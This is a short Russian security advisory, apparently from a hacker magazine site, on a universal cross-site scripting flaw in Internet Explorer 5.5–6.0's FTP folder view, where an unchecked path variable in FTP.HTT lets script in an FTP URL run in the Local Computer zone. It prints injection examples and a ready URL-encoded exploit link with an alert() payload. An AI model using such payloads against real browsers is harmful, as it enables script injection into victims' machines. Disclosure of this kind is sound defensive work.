В Microsoft Internet Explorer обнаружена возможность универсального межсайтового скриптинга. Данные, включенные в FTP URL, могут интерпретироваться как содержание,
что позволяет выполнять произвольный JavaScript
код с настройками безопасности для зоны Local Computer.

Уязвимость возникает при включенном режиме "Folder View for FTP sites" и опции 'Enable Web content in folders' в
Эксплорере.

Проблема находится в файле FTP.HTT, отвечающем
за функцию 'Folder view for FTP sites' (%SystemRoot%\WEB\FTP.HTT). В строке:

---------FTP.HTT--------------------
35: <BASE href="https://xakep.ru/wp-content/uploads/post/15488/%THISDIRPATH%\">
---------------------------------------

Переменная THISDIRPATH не проверяется перед обработкой.

Пример1:

[ ftp://TARGET ]
'%THISDIRPATH%' = 'ftp://TARGET/'
<BASE href="ftp://TARGET/\">

Пример 2:

[ ftp://"><script>alert("Exploit");</script> ]
'%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
<BASE href="ftp://"><script>alert("Exploit");</script>/\">
Эксплоит:
<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>

Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии